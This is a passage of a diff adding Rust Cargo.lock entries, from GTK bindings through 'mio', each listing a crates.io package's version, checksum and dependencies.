+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5c2d13f38594ac1e66619e188c6d5a1adb98d11b2fcf7894fc416ad76aa2f3f7"
+dependencies = [
+ "cairo-sys-rs",
+ "gdk-pixbuf-sys",
+ "gio-sys",
+ "glib-sys",
+ "gobject-sys",
+ "libc",
+ "pango-sys",
+ "pkg-config",
+ "system-deps",
+]
+
+[[package]]
+name = "gdkwayland-sys"
+version = "0.18.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "140071d506d223f7572b9f09b5e155afbd77428cd5cc7af8f2694c41d98dfe69"
+dependencies = [
+ "gdk-sys",
+ "glib-sys",
+ "gobject-sys",
+ "libc",
+ "pkg-config",
+ "system-deps",
+]
+
+[[package]]
+name = "gdkx11"
+version = "0.18.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3caa00e14351bebbc8183b3c36690327eb77c49abc2268dd4bd36b856db3fbfe"
+dependencies = [
+ "gdk",
+ "gdkx11-sys",
+ "gio",
+ "glib",
+ "libc",
+ "x11",
+]
+
+[[package]]
+name = "gdkx11-sys"
+version = "0.18.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6e2e7445fe01ac26f11601db260dd8608fe172514eb63b3b5e261ea6b0f4428d"
+dependencies = [
+ "gdk-sys",
+ "glib-sys",
+ "libc",
+ "system-deps",
+ "x11",
+]
+
+[[package]]
+name = "generic-array"
+version = "0.14.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a"
+dependencies = [
+ "typenum",
+ "version_check",
+]
+
+[[package]]
+name = "getrandom"
+version = "0.1.16"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8fc3cb4d91f53b50155bdcfd23f6a4c39ae1969c2ae85982b135750cccaf5fce"
+dependencies = [
+ "cfg-if",
+ "libc",
+ "wasi 0.9.0+wasi-snapshot-preview1",
+]
+
+[[package]]
+name = "getrandom"
+version = "0.2.17"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0"
+dependencies = [
+ "cfg-if",
+ "js-sys",
+ "libc",
+ "wasi 0.11.1+wasi-snapshot-preview1",
+ "wasm-bindgen",
+]
+
+[[package]]
+name = "getrandom"
+version = "0.3.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "899def5c37c4fd7b2664648c28120ecec138e4d395b459e5ca34f9cce2dd77fd"
+dependencies = [
+ "cfg-if",
+ "js-sys",
+ "libc",
+ "r-efi 5.3.0",
+ "wasip2",
+ "wasm-bindgen",
+]
+
+[[package]]
+name = "getrandom"
+version = "0.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0de51e6874e94e7bf76d726fc5d13ba782deca734ff60d5bb2fb2607c7406555"
+dependencies = [
+ "cfg-if",
+ "libc",
+ "r-efi 6.0.0",
+ "wasip2",
+ "wasip3",
+]
+
+[[package]]
+name = "getset"
+version = "0.1.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9cf0fc11e47561d47397154977bc219f4cf809b2974facc3ccb3b89e2436f912"
+dependencies = [
+ "proc-macro-error2",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "gio"
+version = "0.18.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d4fc8f532f87b79cbc51a79748f16a6828fb784be93145a322fa14d06d354c73"
+dependencies = [
+ "futures-channel",
+ "futures-core",
+ "futures-io",
+ "futures-util",
+ "gio-sys",
+ "glib",
+ "libc",
+ "once_cell",
+ "pin-project-lite",
+ "smallvec",
+ "thiserror 1.0.69",
+]
+
+[[package]]
+name = "gio-sys"
+version = "0.18.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "37566df850baf5e4cb0dfb78af2e4b9898d817ed9263d1090a2df958c64737d2"
+dependencies = [
+ "glib-sys",
+ "gobject-sys",
+ "libc",
+ "system-deps",
+ "winapi",
+]
+
+[[package]]
+name = "glib"
+version = "0.18.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "233daaf6e83ae6a12a52055f568f9d7cf4671dabb78ff9560ab6da230ce00ee5"
+dependencies = [
+ "bitflags 2.11.1",
+ "futures-channel",
+ "futures-core",
+ "futures-executor",
+ "futures-task",
+ "futures-util",
+ "gio-sys",
+ "glib-macros",
+ "glib-sys",
+ "gobject-sys",
+ "libc",
+ "memchr",
+ "once_cell",
+ "smallvec",
+ "thiserror 1.0.69",
+]
+
+[[package]]
+name = "glib-macros"
+version = "0.18.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0bb0228f477c0900c880fd78c8759b95c7636dbd7842707f49e132378aa2acdc"
+dependencies = [
+ "heck 0.4.1",
+ "proc-macro-crate 2.0.2",
+ "proc-macro-error",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "glib-sys"
+version = "0.18.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "063ce2eb6a8d0ea93d2bf8ba1957e78dbab6be1c2220dd3daca57d5a9d869898"
+dependencies = [
+ "libc",
+ "system-deps",
+]
+
+[[package]]
+name = "glob"
+version = "0.3.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0cc23270f6e1808e30a928bdc84dea0b9b4136a8bc82338574f23baf47bbd280"
+
+[[package]]
+name = "gobject-sys"
+version = "0.18.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0850127b514d1c4a4654ead6dedadb18198999985908e6ffe4436f53c785ce44"
+dependencies = [
+ "glib-sys",
+ "libc",
+ "system-deps",
+]
+
+[[package]]
+name = "gtk"
+version = "0.18.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fd56fb197bfc42bd5d2751f4f017d44ff59fbb58140c6b49f9b3b2bdab08506a"
+dependencies = [
+ "atk",
+ "cairo-rs",
+ "field-offset",
+ "futures-channel",
+ "gdk",
+ "gdk-pixbuf",
+ "gio",
+ "glib",
+ "gtk-sys",
+ "gtk3-macros",
+ "libc",
+ "pango",
+ "pkg-config",
+]
+
+[[package]]
+name = "gtk-sys"
+version = "0.18.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f29a1c21c59553eb7dd40e918be54dccd60c52b049b75119d5d96ce6b624414"
+dependencies = [
+ "atk-sys",
+ "cairo-sys-rs",
+ "gdk-pixbuf-sys",
+ "gdk-sys",
+ "gio-sys",
+ "glib-sys",
+ "gobject-sys",
+ "libc",
+ "pango-sys",
+ "system-deps",
+]
+
+[[package]]
+name = "gtk3-macros"
+version = "0.18.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "52ff3c5b21f14f0736fed6dcfc0bfb4225ebf5725f3c0209edeec181e4d73e9d"
+dependencies = [
+ "proc-macro-crate 1.3.1",
+ "proc-macro-error",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "hashbrown"
+version = "0.12.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8a9ee70c43aaf417c914396645a0fa852624801b24ebb7ae78fe8272889ac888"
+
+[[package]]
+name = "hashbrown"
+version = "0.15.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9229cfe53dfd69f0609a49f65461bd93001ea1ef889cd5529dd176593f5338a1"
+dependencies = [
+ "foldhash 0.1.5",
+]
+
+[[package]]
+name = "hashbrown"
+version = "0.17.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4f467dd6dccf739c208452f8014c75c18bb8301b050ad1cfb27153803edb0f51"
+
+[[package]]
+name = "heck"
+version = "0.4.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "95505c38b4572b2d910cecb0281560f54b440a19336cbbcb27bf6ce6adc6f5a8"
+
+[[package]]
+name = "heck"
+version = "0.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea"
+
+[[package]]
+name = "hermit-abi"
+version = "0.5.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc0fef456e4baa96da950455cd02c081ca953b141298e41db3fc7e36b1da849c"
+
+[[package]]
+name = "hex"
+version = "0.4.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7f24254aa9a54b5c858eaee2f5bccdb46aaf0e486a595ed5fd8f86ba55232a70"
+
+[[package]]
+name = "hickory-proto"
+version = "0.24.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "92652067c9ce6f66ce53cc38d1169daa36e6e7eb7dd3b63b5103bd9d97117248"
+dependencies = [
+ "async-trait",
+ "cfg-if",
+ "data-encoding",
+ "enum-as-inner",
+ "futures-channel",
+ "futures-io",
+ "futures-util",
+ "idna",
+ "ipnet",
+ "once_cell",
+ "rand 0.8.5",
+ "thiserror 1.0.69",
+ "tinyvec",
+ "tokio",
+ "tracing",
+ "url",
+]
+
+[[package]]
+name = "hickory-resolver"
+version = "0.24.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cbb117a1ca520e111743ab2f6688eddee69db4e0ea242545a604dce8a66fd22e"
+dependencies = [
+ "cfg-if",
+ "futures-util",
+ "hickory-proto",
+ "ipconfig",
+ "lru-cache",
+ "once_cell",
+ "parking_lot",
+ "rand 0.8.5",
+ "resolv-conf",
+ "smallvec",
+ "thiserror 1.0.69",
+ "tokio",
+ "tracing",
+]
+
+[[package]]
+name = "hmac"
+version = "0.12.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6c49c37c09c17a53d937dfbb742eb3a961d65a994e6bcdcf37e7399d0cc8ab5e"
+dependencies = [
+ "digest",
+]
+
+[[package]]
+name = "html5ever"
+version = "0.29.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3b7410cae13cbc75623c98ac4cbfd1f0bedddf3227afc24f370cf0f50a44a11c"
+dependencies = [
+ "log",
+ "mac",
+ "markup5ever 0.14.1",
+ "match_token",
+]
+
+[[package]]
+name = "html5ever"
+version = "0.38.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1054432bae2f14e0061e33d23402fbaa67a921d319d56adc6bcf887ddad1cbc2"
+dependencies = [
+ "log",
+ "markup5ever 0.38.0",
+]
+
+[[package]]
+name = "http"
+version = "1.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e3ba2a386d7f85a81f119ad7498ebe444d2e22c2af0b86b069416ace48b3311a"
+dependencies = [
+ "bytes",
+ "itoa",
+]
+
+[[package]]
+name = "http-body"
+version = "1.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1efedce1fb8e6913f23e0c92de8e62cd5b772a67e7b3946df930a62566c93184"
+dependencies = [
+ "bytes",
+ "http",
+]
+
+[[package]]
+name = "http-body-util"
+version = "0.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b021d93e26becf5dc7e1b75b1bed1fd93124b374ceb73f43d4d4eafec896a64a"
+dependencies = [
+ "bytes",
+ "futures-core",
+ "http",
+ "http-body",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "httparse"
+version = "1.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6dbf3de79e51f3d586ab4cb9d5c3e2c14aa28ed23d180cf89b4df0454a69cc87"
+
+[[package]]
+name = "hyper"
+version = "1.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6299f016b246a94207e63da54dbe807655bf9e00044f73ded42c3ac5305fbcca"
+dependencies = [
+ "atomic-waker",
+ "bytes",
+ "futures-channel",
+ "futures-core",
+ "http",
+ "http-body",
+ "httparse",
+ "itoa",
+ "pin-project-lite",
+ "smallvec",
+ "tokio",
+ "want",
+]
+
+[[package]]
+name = "hyper-rustls"
+version = "0.27.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "33ca68d021ef39cf6463ab54c1d0f5daf03377b70561305bb89a8f83aab66e0f"
+dependencies = [
+ "http",
+ "hyper",
+ "hyper-util",
+ "rustls",
+ "tokio",
+ "tokio-rustls",
+ "tower-service",
+ "webpki-roots",
+]
+
+[[package]]
+name = "hyper-util"
+version = "0.1.20"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "96547c2556ec9d12fb1578c4eaf448b04993e7fb79cbaad930a656880a6bdfa0"
+dependencies = [
+ "base64 0.22.1",
+ "bytes",
+ "futures-channel",
+ "futures-util",
+ "http",
+ "http-body",
+ "hyper",
+ "ipnet",
+ "libc",
+ "percent-encoding",
+ "pin-project-lite",
+ "socket2",
+ "tokio",
+ "tower-service",
+ "tracing",
+]
+
+[[package]]
+name = "iana-time-zone"
+version = "0.1.65"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e31bc9ad994ba00e440a8aa5c9ef0ec67d5cb5e5cb0cc7f8b744a35b389cc470"
+dependencies = [
+ "android_system_properties",
+ "core-foundation-sys",
+ "iana-time-zone-haiku",
+ "js-sys",
+ "log",
+ "wasm-bindgen",
+ "windows-core 0.62.2",
+]
+
+[[package]]
+name = "iana-time-zone-haiku"
+version = "0.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f31827a206f56af32e590ba56d5d2d085f558508192593743f16b2306495269f"
+dependencies = [
+ "cc",
+]
+
+[[package]]
+name = "ico"
+version = "0.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3e795dff5605e0f04bff85ca41b51a96b83e80b281e96231bcaaf1ac35103371"
+dependencies = [
+ "byteorder",
+ "png",
+]
+
+[[package]]
+name = "icu_collections"
+version = "2.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2984d1cd16c883d7935b9e07e44071dca8d917fd52ecc02c04d5fa0b5a3f191c"
+dependencies = [
+ "displaydoc",
+ "potential_utf",
+ "utf8_iter",
+ "yoke",
+ "zerofrom",
+ "zerovec",
+]
+
+[[package]]
+name = "icu_locale_core"
+version = "2.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "92219b62b3e2b4d88ac5119f8904c10f8f61bf7e95b640d25ba3075e6cac2c29"
+dependencies = [
+ "displaydoc",
+ "litemap",
+ "tinystr",
+ "writeable",
+ "zerovec",
+]
+
+[[package]]
+name = "icu_normalizer"
+version = "2.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c56e5ee99d6e3d33bd91c5d85458b6005a22140021cc324cea84dd0e72cff3b4"
+dependencies = [
+ "icu_collections",
+ "icu_normalizer_data",
+ "icu_properties",
+ "icu_provider",
+ "smallvec",
+ "zerovec",
+]
+
+[[package]]
+name = "icu_normalizer_data"
+version = "2.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "da3be0ae77ea334f4da67c12f149704f19f81d1adf7c51cf482943e84a2bad38"
+
+[[package]]
+name = "icu_properties"
+version = "2.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bee3b67d0ea5c2cca5003417989af8996f8604e34fb9ddf96208a033901e70de"
+dependencies = [
+ "icu_collections",
+ "icu_locale_core",
+ "icu_properties_data",
+ "icu_provider",
+ "zerotrie",
+ "zerovec",
+]
+
+[[package]]
+name = "icu_properties_data"
+version = "2.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8e2bbb201e0c04f7b4b3e14382af113e17ba4f63e2c9d2ee626b720cbce54a14"
+
+[[package]]
+name = "icu_provider"
+version = "2.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "139c4cf31c8b5f33d7e199446eff9c1e02decfc2f0eec2c8d71f65befa45b421"
+dependencies = [
+ "displaydoc",
+ "icu_locale_core",
+ "writeable",
+ "yoke",
+ "zerofrom",
+ "zerotrie",
+ "zerovec",
+]
+
+[[package]]
+name = "id-arena"
+version = "2.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3d3067d79b975e8844ca9eb072e16b31c3c1c36928edf9c6789548c524d0d954"
+
+[[package]]
+name = "ident_case"
+version = "1.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b9e0384b61958566e926dc50660321d12159025e767c18e043daf26b70104c39"
+
+[[package]]
+name = "idna"
+version = "1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3b0875f23caa03898994f6ddc501886a45c7d3d62d04d2d90788d47be1b1e4de"
+dependencies = [
+ "idna_adapter",
+ "smallvec",
+ "utf8_iter",
+]
+
+[[package]]
+name = "idna_adapter"
+version = "1.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3acae9609540aa318d1bc588455225fb2085b9ed0c4f6bd0d9d5bcd86f1a0344"
+dependencies = [
+ "icu_normalizer",
+ "icu_properties",
+]
+
+[[package]]
+name = "indexmap"
+version = "1.9.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bd070e393353796e801d209ad339e89596eb4c8d430d18ede6a1cced8fafbd99"
+dependencies = [
+ "autocfg",
+ "hashbrown 0.12.3",
+ "serde",
+]
+
+[[package]]
+name = "indexmap"
+version = "2.14.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d466e9454f08e4a911e14806c24e16fba1b4c121d1ea474396f396069cf949d9"
+dependencies = [
+ "equivalent",
+ "hashbrown 0.17.0",
+ "serde",
+ "serde_core",
+]
+
+[[package]]
+name = "infer"
+version = "0.19.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a588916bfdfd92e71cacef98a63d9b1f0d74d6599980d11894290e7ddefffcf7"
+dependencies = [
+ "cfb",
+]
+
+[[package]]
+name = "ipconfig"
+version = "0.3.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4d40460c0ce33d6ce4b0630ad68ff63d6661961c48b6dba35e5a4d81cfb48222"
+dependencies = [
+ "socket2",
+ "widestring",
+ "windows-registry",
+ "windows-result 0.4.1",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "ipnet"
+version = "2.12.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d98f6fed1fde3f8c21bc40a1abb88dd75e67924f9cffc3ef95607bad8017f8e2"
+
+[[package]]
+name = "iri-string"
+version = "0.7.12"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "25e659a4bb38e810ebc252e53b5814ff908a8c58c2a9ce2fae1bbec24cbf4e20"
+dependencies = [
+ "memchr",
+ "serde",
+]
+
+[[package]]
+name = "is-docker"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "928bae27f42bc99b60d9ac7334e3a21d10ad8f1835a4e12ec3ec0464765ed1b3"
+dependencies = [
+ "once_cell",
+]
+
+[[package]]
+name = "is-wsl"
+version = "0.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "173609498df190136aa7dea1a91db051746d339e18476eed5ca40521f02d7aa5"
+dependencies = [
+ "is-docker",
+ "once_cell",
+]
+
+[[package]]
+name = "itoa"
+version = "1.0.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f42a60cbdf9a97f5d2305f08a87dc4e09308d1276d28c869c684d7777685682"
+
+[[package]]
+name = "javascriptcore-rs"
+version = "1.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ca5671e9ffce8ffba57afc24070e906da7fc4b1ba66f2cabebf61bf2ea257fcc"
+dependencies = [
+ "bitflags 1.3.2",
+ "glib",
+ "javascriptcore-rs-sys",
+]
+
+[[package]]
+name = "javascriptcore-rs-sys"
+version = "1.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "af1be78d14ffa4b75b66df31840478fef72b51f8c2465d4ca7c194da9f7a5124"
+dependencies = [
+ "glib-sys",
+ "gobject-sys",
+ "libc",
+ "system-deps",
+]
+
+[[package]]
+name = "jni"
+version = "0.21.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1a87aa2bb7d2af34197c04845522473242e1aa17c12f4935d5856491a7fb8c97"
+dependencies = [
+ "cesu8",
+ "cfg-if",
+ "combine",
+ "jni-sys 0.3.1",
+ "log",
+ "thiserror 1.0.69",
+ "walkdir",
+ "windows-sys 0.45.0",
+]
+
+[[package]]
+name = "jni-sys"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "41a652e1f9b6e0275df1f15b32661cf0d4b78d4d87ddec5e0c3c20f097433258"
+dependencies = [
+ "jni-sys 0.4.1",
+]
+
+[[package]]
+name = "jni-sys"
+version = "0.4.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c6377a88cb3910bee9b0fa88d4f42e1d2da8e79915598f65fb0c7ee14c878af2"
+dependencies = [
+ "jni-sys-macros",
+]
+
+[[package]]
+name = "jni-sys-macros"
+version = "0.4.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "38c0b942f458fe50cdac086d2f946512305e5631e720728f2a61aabcd47a6264"
+dependencies = [
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "js-sys"
+version = "0.3.95"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2964e92d1d9dc3364cae4d718d93f227e3abb088e747d92e0395bfdedf1c12ca"
+dependencies = [
+ "cfg-if",
+ "futures-util",
+ "once_cell",
+ "wasm-bindgen",
+]
+
+[[package]]
+name = "json-patch"
+version = "3.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "863726d7afb6bc2590eeff7135d923545e5e964f004c2ccf8716c25e70a86f08"
+dependencies = [
+ "jsonptr",
+ "serde",
+ "serde_json",
+ "thiserror 1.0.69",
+]
+
+[[package]]
+name = "jsonptr"
+version = "0.6.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5dea2b27dd239b2556ed7a25ba842fe47fd602e7fc7433c2a8d6106d4d9edd70"
+dependencies = [
+ "serde",
+ "serde_json",
+]
+
+[[package]]
+name = "keyboard-types"
+version = "0.7.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b750dcadc39a09dbadd74e118f6dd6598df77fa01df0cfcdc52c28dece74528a"
+dependencies = [
+ "bitflags 2.11.1",
+ "serde",
+ "unicode-segmentation",
+]
+
+[[package]]
+name = "kuchikiki"
+version = "0.8.8-speedreader"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "02cb977175687f33fa4afa0c95c112b987ea1443e5a51c8f8ff27dc618270cc2"
+dependencies = [
+ "cssparser 0.29.6",
+ "html5ever 0.29.1",
+ "indexmap 2.14.0",
+ "selectors 0.24.0",
+]
+
+[[package]]
+name = "lazy_static"
+version = "1.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bbd2bcb4c963f2ddae06a2efc7e9f3591312473c50c6685e1f298068316e66fe"
+
+[[package]]
+name = "leb128fmt"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "09edd9e8b54e49e587e4f6295a7d29c3ea94d469cb40ab8ca70b288248a81db2"
+
+[[package]]
+name = "libappindicator"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "03589b9607c868cc7ae54c0b2a22c8dc03dd41692d48f2d7df73615c6a95dc0a"
+dependencies = [
+ "glib",
+ "gtk",
+ "gtk-sys",
+ "libappindicator-sys",
+ "log",
+]
+
+[[package]]
+name = "libappindicator-sys"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6e9ec52138abedcc58dc17a7c6c0c00a2bdb4f3427c7f63fa97fd0d859155caf"
+dependencies = [
+ "gtk-sys",
+ "libloading",
+ "once_cell",
+]
+
+[[package]]
+name = "libc"
+version = "0.2.185"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "52ff2c0fe9bc6cb6b14a0592c2ff4fa9ceb83eea9db979b0487cd054946a2b8f"
+
+[[package]]
+name = "libloading"
+version = "0.7.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b67380fd3b2fbe7527a606e18729d21c6f3951633d0500574c4dc22d2d638b9f"
+dependencies = [
+ "cfg-if",
+ "winapi",
+]
+
+[[package]]
+name = "libredox"
+version = "0.1.16"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e02f3bb43d335493c96bf3fd3a321600bf6bd07ed34bc64118e9293bdffea46c"
+dependencies = [
+ "libc",
+]
+
+[[package]]
+name = "linked-hash-map"
+version = "0.5.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0717cef1bc8b636c6e1c1bbdefc09e6322da8a9321966e8928ef80d20f7f770f"
+
+[[package]]
+name = "linux-raw-sys"
+version = "0.12.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32a66949e030da00e8c7d4434b251670a91556f4144941d37452769c25d58a53"
+
+[[package]]
+name = "litemap"
+version = "0.8.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "92daf443525c4cce67b150400bc2316076100ce0b3686209eb8cf3c31612e6f0"
+
+[[package]]
+name = "litrs"
+version = "1.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "11d3d7f243d5c5a8b9bb5d6dd2b1602c0cb0b9db1621bafc7ed66e35ff9fe092"
+
+[[package]]
+name = "local-ip-address"
+version = "0.6.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d4a59a0cb1c7f84471ad5cd38d768c2a29390d17f1ff2827cdf49bc53e8ac70b"
+dependencies = [
+ "libc",
+ "neli",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "lock_api"
+version = "0.4.14"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "224399e74b87b5f3557511d98dff8b14089b3dadafcab6bb93eab67d3aace965"
+dependencies = [
+ "scopeguard",
+]
+
+[[package]]
+name = "log"
+version = "0.4.29"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897"
+
+[[package]]
+name = "lru-cache"
+version = "0.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "31e24f1ad8321ca0e8a1e0ac13f23cb668e6f5466c2c57319f6a5cf1cc8e3b1c"
+dependencies = [
+ "linked-hash-map",
+]
+
+[[package]]
+name = "lru-slab"
+version = "0.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "112b39cec0b298b6c1999fee3e31427f74f676e4cb9879ed1a121b43661a4154"
+
+[[package]]
+name = "mac"
+version = "0.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c41e0c4fef86961ac6d6f8a82609f55f31b05e4fce149ac5710e439df7619ba4"
+
+[[package]]
+name = "markup5ever"
+version = "0.14.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c7a7213d12e1864c0f002f52c2923d4556935a43dec5e71355c2760e0f6e7a18"
+dependencies = [
+ "log",
+ "phf 0.11.3",
+ "phf_codegen 0.11.3",
+ "string_cache 0.8.9",
+ "string_cache_codegen 0.5.4",
+ "tendril 0.4.3",
+]
+
+[[package]]
+name = "markup5ever"
+version = "0.38.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8983d30f2915feeaaab2d6babdd6bc7e9ed1a00b66b5e6d74df19aa9c0e91862"
+dependencies = [
+ "log",
+ "tendril 0.5.0",
+ "web_atoms",
+]
+
+[[package]]
+name = "match_token"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "88a9689d8d44bf9964484516275f5cd4c9b59457a6940c1d5d0ecbb94510a36b"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "matches"
+version = "0.1.10"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2532096657941c2fea9c289d370a250971c689d4f143798ff67113ec042024a5"
+
+[[package]]
+name = "md5"
+version = "0.7.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "490cc448043f947bae3cbee9c203358d62dbee0db12107a74be5c30ccfd09771"
+
+[[package]]
+name = "memchr"
+version = "2.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f8ca58f447f06ed17d5fc4043ce1b10dd205e060fb3ce5b979b8ed8e59ff3f79"
+
+[[package]]
+name = "memoffset"
+version = "0.9.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "488016bfae457b036d996092f6cb448677611ce4449e970ceaf42695203f218a"
+dependencies = [
+ "autocfg",
+]
+
+[[package]]
+name = "mime"
+version = "0.3.17"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6877bb514081ee2a7ff5ef9de3281f14a4dd4bceac4c09388074a6b5df8a139a"
+
+[[package]]
+name = "minimal-lexical"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "68354c5c6bd36d73ff3feceb05efa59b6acb7626617f4962be322a825e61f79a"
+
+[[package]]
+name = "miniz_oxide"
+version = "0.8.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1fa76a2c86f704bdb222d66965fb3d63269ce38518b83cb0575fca855ebb6316"
+dependencies = [
+ "adler2",
+ "simd-adler32",
+]
+
+[[package]]
+name = "mio"
+version = "1.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
